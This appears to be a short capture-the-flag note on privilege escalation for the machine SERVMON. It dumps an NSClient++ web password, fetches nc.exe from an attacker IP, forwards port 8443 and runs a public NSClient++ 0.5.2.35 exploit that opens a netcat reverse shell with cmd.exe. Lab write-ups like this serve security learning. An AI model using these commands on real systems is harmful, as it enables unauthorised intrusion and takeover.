Priv Esc

cd C:\Program Files\NSClient++
nscp web -- password --display

ew2x6SsGTxjRwXOT

nadine@SERVMON C:\>mkdir temp
A subdirectory or file temp already exists.

nadine@SERVMON C:\>dir
 Volume in drive C has no label.
 Volume Serial Number is 20C1-47A1

 Directory of C:\

02/28/2022  07:02 PM    <DIR>          inetpub
09/15/2018  12:19 AM    <DIR>          PerfLogs
02/28/2022  07:55 PM    <DIR>          Program Files
02/28/2022  07:07 PM    <DIR>          Program Files (x86)
02/28/2022  08:02 PM    <DIR>          RecData
02/28/2022  07:35 PM    <DIR>          Shared
05/27/2024  03:26 AM    <DIR>          temp
02/28/2022  08:04 PM    <DIR>          Users
02/28/2022  07:02 PM    <DIR>          Windows
               0 File(s)              0 bytes
               9 Dir(s)   6,115,024,896 bytes free

nadine@SERVMON C:\>cd temp

nadine@SERVMON C:\temp>curl http://10.10.14.3/nc.exe -O nc.exe
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 66048  100 66048    0     0  66048      0  0:00:01 --:--:--  0:00:01  295k
curl: (6) Could not resolve host: nc.exe

nadine@SERVMON C:\temp>

type nsclient.ini

~C
-L 8443:127.0.0.1:8443

GitHub - xtizi/NSClient-0.5.2.35---Privilege-Escalation: Exploit for Privilege Escalation for NSClient++ 0.5.2.35GitHub

 python3 exploit.py "C:\\temp\\nc.exe 10.10.14.3 1337 -e cmd.exe" https://localhost:8443 ew2x6SsGTxjRwXOT

PreviousEnumeration NextCredentials

Last updated 1 year ago

Was this helpful?